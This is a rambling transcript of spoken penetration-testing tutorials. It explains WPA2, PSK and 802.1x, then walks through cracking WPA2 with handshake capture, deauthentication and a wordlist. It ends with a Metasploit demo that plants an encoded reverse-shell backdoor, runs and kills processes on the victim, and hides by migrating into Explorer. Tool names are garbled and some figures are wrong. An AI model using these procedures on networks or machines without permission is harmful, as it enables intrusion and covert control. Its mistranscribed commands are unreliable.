AES again, because TKIP will be the fallback method, or WEP or no network security at all, which I think would be the worst. So ideally, you can go ahead and disable Wi-Fi protected access, Wi-Fi protected setup, that's WPS, and set your router to WPA2 plus AES. So everything on that list is a less than ideal step down from that. Once you get to WEP, your security level is so low, it's about as effective as a chain link fence. The fence exists simply to say, hey, this is my property and no one should enter. But anyone who actually wanted in would just climb right over it. And finally, I will have to teach you about the 802.1x. So, but before I proceed with that, let me explain you something about the WPA2. There are two forms of WPA. One is WPA PSK and WPA2 PSK. So, the Wi-Fi protected access, that's WPA, and the new WPA2. PSK can either be used for both of the encryption method. WPA or WPA2 Enterprise provides coverage for large entities, but it requires a radius server. WPA Personal, that's WPA2 PSK, is an appropriate use for residential and home business settings. So you might be wondering that how does WPA PSK or WPA2 PSK work? With WPA PSK, that's personal security key, you can configure each wireless LAN node, access point, wireless routers, client adapters, bridges, not with an encryption key, but with a rather plain English passphrase that contains up to 133 characters. And using the technology called as TKIP, that's temporary key integrity protocol, that paraphrase along with the network SSID is used to generate unique encryption keys for each wireless network. So these encryption keys are constantly changed. When clients connect, the WPA PSK authentication users provide the password to the verify whether to allow them access to the network or not. And as long as the passwords match, a client is granted access to the wireless LAN. So you might be wondering that when should I go ahead and use the PSK authentication? PSK was designed for home and small network office that do not require the complexity of 802.1x authentication server. Some reasons to use PSK authentication are: PSK is very simple to implement as opposed to 801.1x, 802.1x authentication, which requires a radius server. But your legacy clients might not support 802.1x or the latest WPA standard. Then you might wonder, why would I not use the the PSK authentication? Even if you have a small company, there are drawbacks to using PSK authentication. For example, if an administrator leaves the company, you should reset the PSK key. This can become quite tiresome and it will be skipped, obviously, because you will not go ahead and actually go ahead and change the keys every day, because you will actually get fed up one or the later point of time, and because you need to go ahead and reconfigure. Let me give an example. You are here to go ahead and learn this tutorial today about wireless hacking. But you might be wondering that, okay, this is just, you can say, as PowerPoint presentation that I'm teaching you right now, and you don't actually have anything to learn like actual hacking. But the thing is, in order for you to know how exactly wireless hacking works, you need to know what are the encryption and decryption protocols are and how exactly they work. Else, you will be similar to the administrator who just goes ahead and keeps his password as abcd@123, thinking that he has a total of 8 characters which are different, and he may probably keep A as capital and D as capital, and he will think that he has a good security because he has capital letters, lowercase letters, and different characters and numerics as well. But no, that is one of the most easiest to crack. Similarly, just going ahead and cracking a Wi-Fi is not. So if sometime later on, if someone gains access to your Wi-Fi, you will know that he's not a noob, because people who are new to hacking cannot go ahead and crack a Wi-Fi, or not as even a single noob can go ahead and crack a Wi-Fi password, especially WPA or WPA2, because it requires intense knowledge about how the encryption and decryption protocols works. So coming back to our point, if an administrator leaves the company, you should reset the PSK key, and this may be skipped by a lot of administrators. If one user is compromised, even if one, then all the users can be hacked. PSK cannot perform machine authentication the way that IEEE 802.1x authentication them. Keys tend to become old because they are not dynamically created for users upon login, nor are the keys rotated frequently. You must remember to change the keys and create keys long enough to be a challenge to hackers, or to be much irritable for people to go ahead and change them every now and then. So if you want me to be more precise, a proper way of creating a key is something like would be typing A8GHIP0. No, not this won't suffice. So this doesn't make any sense, right? Yes, that's why. And this should be how your password should look like. Any random set of numbers, but you should make sure that you don't have any kind of specific word that can make sense, because if that does, then it will make 99% more sense to the computer, and it will be able to crack your password. So to be more precise, this is how your password should look like. And this I don't think that these people can go ahead and crack these kinds of password, but still there's another way that is called social engineering, which you already know. And PSK is subject to brute force key space search attacks and dictionary attacks. And one more thing you can do is, let's say for example, you just go ahead and type random passwords like this, and this is an example. And one more thing, instead of just keeping these, you can also go ahead and type a space. Yes, space also tends to be a password. And normally people go ahead and keep the space at the start or at the in between, but no one actually goes ahead and thinks of space in the end. You can have multiple spaces in the end, and you can type something like, not ASD because it's quite easy to understand, so this. And if you have this password in WPA2, I can guarantee you with anything that no one will be able to crack, except until it is social engineering. Even I think you won't be able to remember this password yourself, no matter how much times you go and actually try to remember them. Just a quote. So WPA2 PSK uses a more advanced encryption type. Additional processing power is required to keep the network functioning at full speed, and wireless networks that use legacy hardware for access point and routers can suffer speed reductions when using WPA2 personal instead of WPA, sorry. And especially when several users are connected or large amount of data is moving through the network. Because WPA2 personal or PSK is a new standard, firmware upgrades can also be required for some hardware. Normally you won't be requiring that, but still it is much better than WPA exclusively. How is WPA encryption different from WPA PSK, you might be wondering? The primary difference between WPA and WPA2 PSK are the encryption ciphers used to secure the network. WPA can use only the encryption cipher, that's TKIP, whereas WPA2 PSK can use TKIP. But because TKIP security keys are less secure, WPA2 protocol usually uses the AES encryption method. And AES uses a much more advanced encryption algorithm that cannot be defeated by tools that overcome the TKIP security, and making it a much more secure encryption method.
Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So before I go ahead and teach you actually how we can actually go ahead and hack into something, I'd like to teach you about one final thing before that, and that is 802.1x. Understanding what the IEEE 802.1x standard is and why you should care means understanding three different concepts which I will be teaching you today, that is PPP, EAP and 802.1x itself. So understanding what IEEE 802.1x understand, I'll go and teach you exactly what that means today. So most people are familiar with PPP, that's point-to-point protocol. PPP is, or I'll call it as PCube as of now because that's quite easy than going ahead and spelling it out as PPP or pronouncing it PPP, whatever. So PPP is most commonly used, or PCube is most commonly used for dial-up internet access. PCube is also used by some ISP for DSL and cable modem authentication in form of PCube over Ethernet. So PCube is a part of layer 2 tunneling protocol that is a core part of Microsoft's secure remote access solution for Windows 2000 and after that. PCube evolved beyond its original use as a dial-up access method and is now used all over the internet. One piece of PCube defines an authentication mechanism. With dial-up internet access, that's the username and password you're using. PCube authentication is used to identify the user at the other end of the PCube line before giving them access. Most enterprises want to do more for security than simply employing username and passwords for access. So a new authentication protocol called the Extensible Authentication Protocol, that's EAP, it was designed. EAP sits inside the PPP's authentication protocol and provides a generalized framework for several different authentication methods. EAP is supposed to head off proprietary authentication systems and let everything from password to challenge response tokens and public key infrastructure certificates all work smoothly. So with a standardized EAP, interoperability and compatibility of authentication methods become very simpler. For example, when you dial a remote access server and use the EAP as part of your PPP connection, the RAS doesn't need to know any of the details about the authentication system, and only you and the authentication server have to be coordinated. By supporting EAP authentication, as a RAS server gets out of the business of acting as middleman and just packets and repackages EAP packets to hand off to a radius server that will do the actual authentication. So this brings us to the IEEE 802.1x standard, which is simply a standard for passing EAP over a wired or wireless LAN. With 802.1x, your package EAP messages in Ethernet frames, and it does not use PPP. Its authentication needs much more. That's desirable in situations in which rest of the PCube isn't needed when you're using protocols other than the TCP/IP, or where the overhead and the complexity of PPP is undesirable. But 802.1x uses three terms that you need to know. The user or client that wants to be authenticated is called as a supplicant. The actual server doing the authentication, typically a radius server, which is called the authentication server, and the device in between, such as a wireless access point. It is also called as the authenticator. One of the key points of 802.1x is that authenticator can be simple and dumb, and all of the brains have to be, let's say, in the supplicant and the authentication server, similar to like computer. Your monitor is just deaf and dumb, and it does all the work that your computer does, that your CPU does. So this makes 802.1x ideal for wireless access points, which are typically small and have little memory and processing power. So the protocol in 802.1x is called EAP encapsulation over LANs. That's EAPOL. And it is currently defined for Ethernet-like LANs, including 802.11 wireless as well. And along with that, as well as the token ring LANs such as FDDI. And EPOL is not particularly sophisticated. There are number of modes of operation, but the most common case would look something like the authenticator sends an EAP request identify packet to the supplicant, and you can say, as let's say, as soon as it detects that the link is active, it will go ahead and send the packet. The supplicant sends an EAP response identity packet to the authenticator, which is then passed on to the authentication server, that's Radius. And the authentication server sends back a challenge to the authenticator, such as with the token password system. The authenticator then unpacks this from the IP, that's Internet Protocol, and repackages it into EAPOL. That's again what I told you previously, that's EPOL, that's EAP encapsulation over LAN. And then it sends it back to the supplicant. So different authentication methods will vary this message and total number of messages. EAP supports client-only authentication and strong mutual authentication. Only strong mutual authentication is considered appropriate for the wireless case. And to be more specific, in the end, if the supplicant provides proper identity, the supplicant responds to the challenge via authenticator and passes the response on to the authentication server. Supplicant provides proper identity, the authentication server responds with a success message, which is then passed on to the supplicant. The authenticator now allows the LAN, possibly restricted based on the attributes that came back from the authentication server. To be more specific, let's say the authenticator might switch these supplicant to a particular virtual LAN or install a set of firewall rules. So you might be wondering that how does the 802.1x help wireless security? So it's so complicated. The 13-year-old wired equivalent policy, that's WEP protocol, it has been discredited so thoroughly that its authentication and encryption capabilities are not considered sufficient for use in enterprise networks. In response to the WEP fiasco, many wireless LAN vendors have latched onto IEEE 802.1x standard to help authenticate and secure both wireless and wired LANs. The wildcard with 802.1x protocol is interoperability. So 802.1x authentication might it helps mitigate, you can say, as many of the risks involved in using WEP. For example, one of the biggest problems with WEP is the long life of keys and the fact that they are shared among users and are very well known. With 802.1x, each station could have a unique WEP key for every session. The authenticator, that's wireless access point, could also choose to change the WEP key very frequently, such as even every 10 minutes or every 1000 frames. So the 802.1x does not guarantee improved security. For example, an authenticator might never change the key it hands out to each supplement, or the network manager might select an authentication method that does not allow for distribution of WEP keys. So 802.1x does, however, give the informed network manager the potential design and implement a more secure wireless LAN. So this is how it works in total. It's not always how much secure you can keep. It's more about how much you can go ahead and complicate it so that it becomes more complicated for the attacker to go ahead and hack, and he will simply go ahead and lose his trust in hacking, and he will probably may not or leave that part and try something else. And at least your wireless security will be secure. So Wi-Fi, and just to be sure, Wi-Fi cracking is not for beginners, and playing it with it requires basic knowledge of how WPA authentication works and moderate familiarity with Kali Linux and its tool. So if any hacker at any point of time gains access to your network, he is probably no beginner, because no one can go ahead and crack a Wi-Fi that's a WPA2 password by mistake, unless until he does some kind of social engineering, in which case he's again very good, and again you are at loss. So that is it, and that's the end for my theoretical part for the WPA and the wireless security keys. In this tutorial, I'll be actually teaching you as to how we can go ahead and hack into some network using Kali Linux. Hey guys, and welcome to the next tutorial of ethical hacking and penetration testing. And in this tutorial, I'll be teaching you exactly how we are going to go ahead and hack into our Wi-Fi network using our Kali Linux. So you can just go over here and I'll just start my operating system. And there is a sad news that I won't be actually show it to you as to how we can go ahead and crack into that, but I will teach you. The reason being that if you're using VMware like me, you too probably won't be able to hack into Kali Linux, hack into your Wi-Fi network. The reason being that Kali Linux does not support Wi-Fi cracking via VMware or through any kind of subsidiary operating system software. If you want to go ahead and crack, you'll actually have to go ahead and install it manually on the hardware and then run it separately rather than going ahead and running it under Windows. Because when running over it like this, the Kali Linux needs to put your Wi-Fi into wireless monitor mode, in which it needs to scan the computers, which cannot be done when you are accessing Windows as well. So I will only be able to teach you exactly how that works, and I'll show you the tools, even if I'm not able to run that in my system, but I will teach you the proper way. So let's fire up our Kali Linux. So a few things that you would need today would be a successful installed Kali Linux version, and be a wireless adapter that is capable of injection or monitor mode, and a word list to try and crack the handshake password once it has been captured. So two things most important that would necessary would be time and patience. If you think that you can just go ahead and type in something and crack the Wi-Fi password like you could do for something else, you're wrong. Wi-Fi cracking, even if it's simple and WPA2, it takes like hours of cracking to actually go ahead and crack into something. Minimum of like 4 hours, 5 hours, sometimes even days, like 3 or 4 days. So Wi-Fi, that's why I told you in the very beginning that Wi-Fi cracking is not for beginners. It's if someone has hacked into your Wi-Fi system, he's probably a pro. So now one more thing that we would need would be a word list to go ahead and crack the handshake. So if you have all of these things, time, patience, specific softwares and the hardware, just let's roll up your sleeves and let's see how secure your network is. So as of now, I don't have my wireless adapter. If you have it, you can go ahead and connect that to your computer. If you're Linux Kali Linux in VMware, then you might have to connect the card via image icon in the device menu. So, and after that, the next thing that you would need to do would be to disconnect everything from the wireless network and open a terminal and type rmon-ng. So probably in my system, I won't be able to teach you much. The reason being that I am teaching you this on a desktop and don't have a Wi-Fi installed over here. But still, I'll go ahead and teach you all the commands that you will need. So you can type rmon-ng and hit enter, and it will show you the interface. I don't have anything, but for you, it will show you WLAN 0. And this will list all the wireless cards that support monitor mode, not injection mode. And if no cards are listed, try disconnecting and reconnect the card and check that it supports the monitor mode. We can check if the card supports monitor mode by typing ifconfig in another terminal and see if the card is listed in ifconfig but doesn't show up in rmon-ng, then the card does not support it. You can see that over here, you cannot see my card. The reason being that I don't have anything installed, but I'll still go ahead and show you the commands. So you can go and type rmon-ng followed by the interface of your wireless card. So let's say, for example, if you have WLAN 0, then you can go ahead and type rmon-ng space start, and for your case it would be WLAN 0 because that would be your wireless network. Over here we won't have anything, and just ignore all of these things. It will get you, no matter what you do, you will always get these errors. So after you go ahead and do this, this message that you will see something like monitor message enabled over here in the end. This message means that the card has successfully been put into monitor mode. Note that the name of the new monitor interface will be mon0, that's mon0, that's monitor 0. And recently a bug was discovered in Kali Linux that makes rmon-ng set the channel as fixed -1. So when you first enable mon0, you will see this error. And if you receive this error, do not simply take any kind of chance. You need to follow some specific steps after enabling mon0. So you can go and open your another terminal and type ifconfig. Over here you will not see anything, but in your case you will see the interface of your wireless cards, that WLAN 0. So replace the interface of your wireless card with the name of the interface that you enabled mon0 on, probably called as WLAN 0. This disables the wireless card from connecting to internet and allowing it to focus on monitor mode instead. And that is the reason why I won't be able to go ahead and show it to you on my VMware. The reason, unless I go ahead and connect something or Wi-Fi. The reason being that when you're using inbuilt Wi-Fi in Windows, it will not allow to go itself in the monitor mode as it does in Linux. So after you have disabled Mon 0, you will need to enable WLAN 0. And that would be your actual wire. So you can go ahead and type ifconfig and the interface of your network card, and then pressing enter. After that it's done, your card will be active, and then you can go back to your original terminal, and you can go ahead and if you you can go ahead and type arrow dump ng followed by the name of your new monitor interface, which is Mon0 probably by now, and P would be single. Sorry, yeah, perfect. And it would be Mon0, the new network would be. And once you go ahead and type this, as of now there won't be any interface because I don't have installed, so just ignore this error. But as soon as you go ahead and see this, you will see fixed -1 error, and if you see this, then everything is perfectly fine. The next step that we need to do would be Aerodom will now list all the wireless networks in your area and lots of useful information about them. Locate your network or the network that you have permission to penetrate into, and once you have spotted your network, you can go ahead and stop the ever-populating list by hitting Ctrl+C on your keyboard to stop the process. Now note the channel of your target network. You will see some kind of like BSID and something. Once you see this, go ahead and type arrow dump -ng space -c and -bssid, and over here -c means would be the channel, and you will know exactly what the channel is once you go ahead and start your Wi-Fi interface running. You will see the channel when you go ahead and see the BSID, as I told you, after typing this, and after you will see the BSID and the channel. So just type C, or in case the channel is 0, you can go and type 0. BSSID would be any of your ID that would be, let's say for example, 10 is to FF is to E is to 12 is to 12. I don't know exactly what I'm writing. I'm just writing random stuff, but this is something how it would look like. After that, you can type -w slash space slash root slash desktop slash, and you can go ahead and type monitor interface bracket and hit enter, and you can go ahead and replace the channel with the channel of your target network, paste the network of your BSID, and replace the monitor interface over here with whatever your monitor interface is with the name of your monitor enabled interface. So in your case it would be Mon0. Perfect. So it would look something like this, and don't put brackets, just put something directly. So a complete command would do something like this. I'll just go ahead and make some changes so that it will be easier for you to understand. This would be the channel as how it looked in my previous laptop, and here it would be the MAC ID of your computer. So it would look something like 00:14:BF let's say E0. Okay, I think I typed something wrong, or my numlog is off, I believe. E0:E8:D5. So it would look something like this, and after desktop there would be a space in between, and you can go ahead and hit enter over here. So once you go ahead and do this, you will actually go ahead and see what all things are actually running. So that's it for this tutorial. In the next tutorial, I'll be continuing with it will be a continuation of this tutorial as to how we could actually go ahead and crack the system. So after you have went ahead and ran all of these things, Aerodom will now monitor only the target network, allowing us to capture more specific information about it. So what we're really doing now is waiting for a device to connect or reconnect to the network, forcing the router to send out the 4-way handshake that we need to capture in order to crack the password. Also, 4 files to show up on your desktop, and this is where the handshake will be saved when captured. And make sure that you don't delete them, else you will have to go ahead and capture them again. But we're not actually going to wait for a device to connect. No, that's not what impatient hackers do, and we are impatient hackers. So we're actually going to go ahead and use another cool tool that belongs to the aircrack suite that is called as AirPlay-ng to speed up the process. And instead of waiting for a device to connect, hackers use this tool to force a device to reconnect by sending a deauthentication packet to the device, making it think that it has to reconnect with the router. Of course, in order for this tool to work, there must be someone else other than you, or I know that you are not connected, but there must be someone else, at least one party that must be connected to the network first. So watch the error.ng and wait for a client to show up. It might take a long time depending upon what time of day it is and who's actually connecting it. And if you're around in a corporate area, then you will obviously get someone or the other. Or it might take only a second before the first one shows. If none show up after a lengthy wait, then the network might be empty row or you're very far away from the network. So if you go ahead and wait, then I'll assume that you have some client in between that has appeared on your network. So we'll continue to the next step. So now you need to go ahead and keep this specific command running, that's error.ng, and you need to open a second terminal and you need to type something like this: airplay ng space -0 space 2 space -a. Don't worry, I'll be explaining this to you what exactly this is. Over here it would be router bssid, over here -c from client bssid mon 0, and over here -0 is a shortcut for the deauthorization mode. 2 is the number of deauthorization packets to send. -a indicates the access point, that is the router's bssid, and replace the router's bssid with the bssid of the target network, so which in my case over here would be something different. That would be this one, that's the MAC ID, and bssid and MAC ID are the same, just to be clear. And -c would be the it indicates the client's bssid, and that you have noted in the previous picture. Replace the client's bssid, that means the person who has connected to the network, and this will be listed under the station. So over here I'll just go ahead and create some random ID again. It will be 00:14 colon let's say FG colon CD colon. I don't know how exactly this works or what is the method as to how exactly this works, so I'm just writing any random stuff. E008, perfect. I believe 66. Okay, perfect. And in the end, mon0, that is your obviously your monitor interface. Change it if it's different. It's monitor 1 or 2 or whatever it is. So this will how exactly the command line will look like. Upon hitting enter, you will see airplay ng sending the packets, and within moments you should see this message appear on the error.ng screen. This means that the handshake has been captured, the password is in the hacker's hand, and maybe in some form or the other, but you have the password. You only thing that you need to do is to decrypt the keys. So you can go ahead and close the airplay ng terminal and hit Ctrl C on the error.ng terminal over here to go ahead and stop the monitor mode. And but don't close it just in case you need some information later on. So I have closed it because I have no reason to keep it started because I have not even ran it. So this, as of now, till now, it concludes the external part of our tutorial. From now on, the process entirely between you is inside your computer, and the 4 files that on your desktop, that is, you'll get some 4 files over here in the desktop with period, cap extension. That is important. So I'll just go ahead and delete all of these things because I have no reason to keep it as it is. So open up a new terminal and type in the following command, which is aircrack ng space -a2 space -b space the router's bssid. So over here I'll just type some random stuff. E9, perfect. And over here I'll just type -w. This would be the path to the word list. So in our case it would be something like /root, and let's say for example w, and the name of my word list would be, I'll just go ahead and type word list over here, whatever the name of your word list is, /desktop if I have that on the desktop. Okay, let me check. Okay, desktop / and whatever is the extension of your cap file that you find it over here. So what it is going to do is that it's going to crack the MAC ID. Just use the MAC ID to go ahead and crack this cap extension with our word list. So -a is the method aircrack will use to crack the handshake. A2 is the WPA method, that's WPA2. -b stands for the BSS ID, and -w stands for the word list. Replace the path word list with the path to your word list that you have downloaded. I have the word list called as WPAT, that's W word list period txt. So I'll just type something like txt if it is in my root directory, and I will just type space and root slash desktop period cap asterisk period cap is the part to the cap file containing the password. And the asterisk means a wildcard in Linux. Since I'm assuming that there are no other cap files on your desktop, this should work fine the way it is. So this is how my complete command line would look like. And just in case your word list is in some other directory, what I'll just type, if it's on the same as desktop, I can just type something like this. Perfect. Okay, sorry, I missed out a bit. And slash, perfect. And I don't need P. Perfect. So this is how it should look like in actual scenario. And as soon as you hit enter, AirCrack NG will now launch into a process of cracking the password. However, it will only crack if the password happens to be in the word list that you have selected. Sometimes it nots. In case the password is something like AZSD12911S47, some random word. In case it's that, it won't be crackable. And if this is the case, then you can congratulate your owner on being impenetrable. Of course, only after you have tried every word list that a hacker might use or make. And cracking the password might take a long time depending on the size of the word list. When I tried previously, mine went very quickly, and the password that I got from when I cracked previously, what a monster at that 159, and the password like MONSTAR, sorry, at the rate R, and it was hash 159. And if you think that this is a tough password, it's not. It was easily cracked in approximately 15 minutes, I believe. So the passphrase to test our network was not secure, and you can see that AirCrack found it. So if you find the password without a decent struggle, then change your password. So best way to do this would be go ahead and crack your own Wi-Fi setup. And if you're penetrating someone else, then tell them to change your password as soon as possible, unless you want them to go ahead and actually get into some kind of trouble. So that would be it for this tutorial from my end for today. And that's how we actually go ahead and crack a Wi-Fi password. And so if you are thinking right now that this is quite easy for someone to go ahead and crack that password, trust me, it is not. So next time if somebody cracks your password, make sure that you will need to come to know that password cracking, or actually Wi-Fi cracking instead, is not a process that a noob can do. You need to be a pro. So that is it for this tutorial and the end of wireless cracking. So in the next tutorial, I'll be teaching you, maybe teach you about Bluetooth cracking, or I'll go on to the next chapter. Hey guys, and welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in this tutorial, I will be starting up with the interpreter prompt. So I'll just go ahead and start my virtual machine. So in most of my tutorials, I have actually gone through most of the commands in interpreter prompt, but I have not told you what exactly it is and how exactly it works. So in this tutorial, we will be covering all most of the things about interpreter prompt, and after you have done this, then you will know exactly how it works and how you can go ahead and use that to go ahead and grab different sessions from your target's computer. Let's start it up. Okay, so before I proceed, let me give you a brief introduction. Interpreter has been successfully integrated into Metasploit framework, that is MSF console. So it can be accessed through a number of different payloads. And Interpreter has not only been implemented on Windows, but its principle and design are fully portable to a variety of operating systems, such as including Linux. So you can also go ahead and download the Metasploit if you don't have, let's say for example, for some reason you're not using Kali Linux for any random reason, you have Ubuntu, or let's say if you have Windows, for let's say, or even Mac, then we have Interpreter prompt for that. For that you need to install the Metasploit, which I would be explaining in detail later on, but as of now you can just go over here and download that for, I believe Rapid7 are the people who are actually, okay, never mind. So you can check it over here, as Metasploit Pro is also there for community, as well as the default one, that's the free one. And I believe we also have it for the Windows version. So let me check for which one it is exactly. Okay, I was redirected to the same page. Never mind. Okay, so as you can see, we have it for the Linux for 64-bit, 32-bit, and for Windows that's only 64-bit. And I believe we don't have it for Mac. Yeah, we don't have it for Mac. Never mind, but we can still go ahead and start it in our virtual machine by using in any of the Unix or the Linux system. So coming back to our own screen, the first thing that I would be teaching you would be the Windows 32 bind interpreter. So this payload binds to a port on the target machine and waits for a connection. And after the connection is established, the interpreter server is uploaded and the existing connection is used for the interpreter communication channel. After that, we have Windows 32 reverse interpreter, and this payload connects back to the attacker on a given port. The connection is then used to upload the interpreter server, after which point it is used for the interpreter communication channel. So I'll just go over here and show you how exactly it looks like. You can start it through a lot of ways. I'm just giving an example. Let's say, for example, let me check social engineering and payload and listener. I just type any random IP address. I'm not actually going ahead and creating anything, so I'm just showing you exactly how it works like. So as I told you about Windows 32 bind interpreter, that is this shell over here, and it's also available for 64-bit as well. Then we have the reverse shell, that's these three, and then we have Windows 32 FC find receive ORD interpreter. So I don't know exactly where it is exactly. Maybe it will be there in some other payload. But Windows 32 find receive ORD interpreter is a payload that searches for a file descriptor that the exploit was triggered from and uses it to upload the interpreter server, after which point the connection is used for the interpreter communication channel. So this payload is particularly intriguing because it does not require that a new connection be opened and thus bypasses all firewall connections. Depending upon the exploit, any one of these payloads can be used. The most preferable payload is entirely dependent on both the exploit and the conditions under which the exploit is being performed, such as firewall restrictions or without firewall or otherwise. So it doesn't mind. So after a payload has been selected, the fun can begin. The first step is to start the Metasploit client interface and though Metasploit provides a number of interfaces, including MSF Web, MSF Console, MSF CLI, we will be using MSF Console for this illustration purpose. So I'll just go ahead and start the terminal, and I can just type MSF Console. It will take quite a bit for it to start, since it only has 1 GB of RAM. So we'll just quietly wait till it starts. Okay, I'll do one thing. By the time it starts, I'll go ahead and start my Windows 7. If for any other reason I needed to implement the payload on my Windows 7. This MSF console can take quite a bit of time to start if you are starting it for the first time, because it needs to go ahead and develop all the caches. Okay, perfect. Let's see if we don't have our payload that we created in our last tutorial. Never mind, we'll just create it again. So now we'll just have to wait till this command prompt starts. Okay, perfect. So this is the awesome Metasploit banner. I believe it looks like a cow or something. Never mind. So yes. So once at this prompt, the first thing that we need to do is pick up an exploit. So just for the sake of the demonstration, I'll be using a tester exploit that is going to be used, which is simply an exploit that is used against a daemon that executes whatever code is thrown at it. So I'll just go ahead and type use tester. I believe the T should be capital. I don't remember exactly the last time I did, so let me check. Yeah, I believe the T should be capital. Okay, I believe that I have not yet imported this tester, but never mind. So if you have a module named as tester that you have actually went ahead and imported this, So just assume that tester is some kind of payload, and this is how you will go ahead and use it. I will be using an actual payload later on, or a module to go ahead and load, and I'll show you. So just for the time being, just assume that tester is some kind of a module. So after selecting the tester exploit, the next thing to do is to select the payload that is to be used. So for demonstration, the Win32 reverse interpreter payload will be used. So aside from that payload, it is also necessary to set variables that are required by the exploit and payload, such as the remote host, the remote port, which represent the target host, as well as the local host and local port, which are used by the payload when connecting back to the attacker. So the next thing that we would like to do is to go ahead and set payload. It will probably not work. The reason being that I have not yet loaded the module. Perfect. So as soon as I set payload, it's giving me the option that set the given option to value. If value is omitted, print the current value. So what it's saying me exactly is that after set payload, I need to go ahead and set an option and a value. So after we have set up some kind of payload, I'll just go ahead and type set payload. Let's say Win32, and I'll just type underscore reverse underscore interpreter. Let's see if I'm able to go ahead and set this payload. Well, the payload is not valid, so let me check if it is in small. Okay, never mind. So this is how you go ahead and set up a payload. The reason being that Windows 32 exploit is not yet here. So that's how it will look like. After that, we have to go ahead and set the R host. And just let me be clear that the reason we are not getting any specified value for the payload is because this we haven't used any tester module as of now. If we had used any kind of specific module, only then we will be able to load the payload, because the payload is loaded after the tester. So if you go and try to go ahead and load the payload value or the R host before using any specific module, then it won't work. So I will be going ahead and using that, but for later option, as of now, I'm just giving you an idea exactly how it works. So after that, we have to set an R host, and that would be the remote host. That would be my own computer's IP address. So it would be 127.0, whatever your IP address would be. I'm just using a random IP address. And after that, once you go ahead and see this, you need to set the R port. That would be by typing R caps PORT, and then you have to 1, 2, 3, 4, 5 or 5, 4, whatever your R port would be. And so when you have set the R port, then we need to go ahead and set the local host. So that means the computer which we are trying to attack. So it would be L host and 127.0.0.2, whatever. And then, okay, it should be L host. Perfect. And after that, okay, it should be L host. Perfect. After that, the final thing would be set L port, and we can set the L port to anything, 1279. And this is how the L port is set. So finally, with the payload and exploit defined, it's time to fire up these engines. And with that, the interpreter connection is established and it's ready to be used. So the first order of business is to issue the help command to get a feel for what features are available. So all of these commands are explained in detail in my tutorials. And the most useful for the point of illustration is the use command. This command allows for dynamically loading interpreter extensions from anywhere. These extensions are automatically uploaded to the target machine and then loaded from the memory. For example, let's say one of the extension allows for executing and killing processes, as well as getting a list of running processes. So this extension is the process extension, which can be loaded by issuing the commands such as, let's say for example, use. You can type use -m. Only after the process is executed, you can go and type use -m process. It won't work now because I have not yet executed the payload, but this is how it looks like. So, and after the extension has been loaded, the new command will be added to the help output. So for process extension, you can just go and type something like help, and it will give you everything. Over here, you won't see any stuff like that. The reason being that I have not yet uploaded the module, because I have not even yet started the payload. That's why. But once you have uploaded the module and executed the payload, you will see this process module over here included. But I believe that we already have a process named module over here named as PS. Okay. Okay, I cannot see it, but as soon as I go ahead and start any kind of remote access, then it will probably start. So that's how it looks like. So I'll just quickly go ahead and execute payload, or I'll just go ahead and start. I'll just type, let's say, use payload Windows, and I don't know exactly how it works. Let me check if O works. I believe it should be the capital O. That should work. Never mind, I'll just go ahead and start up my social engineering toolkit. That would be much more easy for me to go ahead and start up the payload. And I'll create a payload and listener, my IP address. Now this is my IP address. I'll just copy it and paste it over here. It would be 2, I believe. Every time I go ahead and use the backdoor executable, let's go ahead and check what Shikata Ganai does. So port would be 443. And by the time it's executed, let me go ahead and disable my firewall, because else it will go ahead and not allow me to copy it. Just for the time being, I'll disable this. I'll minimize this. And your payload is copied, so I'll just go ahead and start the directory. I typed yes, right? Yeah, perfect. So I'll just go ahead and into the where it is exactly, SCT home directory. So I believe SCT will be over in the root folder or USR. Okay, here we have the payload file. Just copy it and paste it over here. Oh, what is this exactly? Because copy it, paste it over here perfectly, and I'll just copy it and paste it over here. So yep, that's how it looks like. So I'll just go ahead and execute my payload over here, and I'll just go ahead and start it. I should be getting a session open over here, something like that. Okay, perfect. So session 1 is open. So I'll just go ahead and type sessions -L. It will give me the sessions that are open, and I'll just go ahead and type 1. So I have the interpreter prompt open. So if I want to go ahead and, let's say, I'll just type use -M or CESS. Let me check. Okay, so I need to go ahead and update the process module. For that, I can just go ahead and type PS, and it will show me the process. And the reason why I am not able to go ahead and install the process module over here, the reason for that would be because I already have a process module installed. It will only go ahead and duplicate the effect. I'll then just go ahead and type help, and I can see the all of these exact things which are already here. So you don't actually need to go ahead and create any kind of process. I'll just go ahead and show you where exactly is the process command. It is PS. Okay, perfect. List running processes, or terminate a killing a running process. This is how it works like. So after the extension has been loaded, new commands can be easily added to this set of features. So I'll just show you some more thing that I'll just go ahead and show you how a read works like. It reads data from any specific supply channel. And as you can see, it's giving me a channel ID to go ahead and read. So I can go ahead and read anything. So what it does is that it actually reads from a communication channel. If I'm trying to communicate with someone, it will go ahead and read all the data. It's encrypted or unencrypted, it doesn't matter. It will straight away go ahead and read that. If I want to write something or poison something in that communication channel, I can go and type write, and I can go ahead and write anything I want. So I can just go ahead and write it on a communication channel, or write the contents of a file on a disk, or anything like that. After that, we have close, that closes a communication channel. So I can just go and type close. It will close the supplied channels, provided that I had to provide it with the channel ID. And after that, we have the help. So as I have already shown you what help does, that it will display all the registered commands. If I go and type exit, it will go ahead and disconnect me from the interpreter session. And finally we have subsystem. So subsystem extensions are feature extension commands. So I'll explain that to you later on, not at this point of time. Then we have load library. I can just go and type load lib. Okay, I believe that this command was removed. But previously it used to go ahead and load a library on the remote endpoint, and it uses a feature extension module that's process, manipulation, and execution of command. If I go ahead and type execute, it will ask me what it wants to execute. I can go ahead and execute a process or dummy executable length or anything, but it will be on the remote machine endpoint. If I go ahead and use the kill option, it will go ahead and kill one or more processes on the remote endpoint. PS will list all the processes, and I can also go ahead and use any specific file name. Let's say, for example, if I wanted to execute any file on the remote machine, I can type execute -f, and it would be the file name over here. Let's say, for example, test. I don't have anything on the remote machine in my Windows, but if I had, it will straight away go ahead and execute that. Let's see if I could go ahead and execute the command prompt. Okay, you must specify an executable with an F, but it will not go ahead and able to execute it because I have nothing named. Okay, it was created. Great. So let me go ahead and check it's 2648. So let me check the process if it's created. Okay, perfect. So I have the 2648 process created. I'll just go ahead and kill it. 2648. Again, I'll just go ahead and check. Okay, 2648 was killed. Perfect. So this is how it looks like exactly. And as you can see, I have the payload over here running and running perfectly. I'll just go ahead and migrate it to the Explorer so that no one will be able to see me. So let's see if I'm perfect. And I'll just go ahead and see. I should get something. Okay, as you can see, I can. The person who has this will not be able to see whether I was there on their PC because you will not be able to see the payload file. So similarly, I can also go ahead and supply the H argument, -H argument, or the -H for 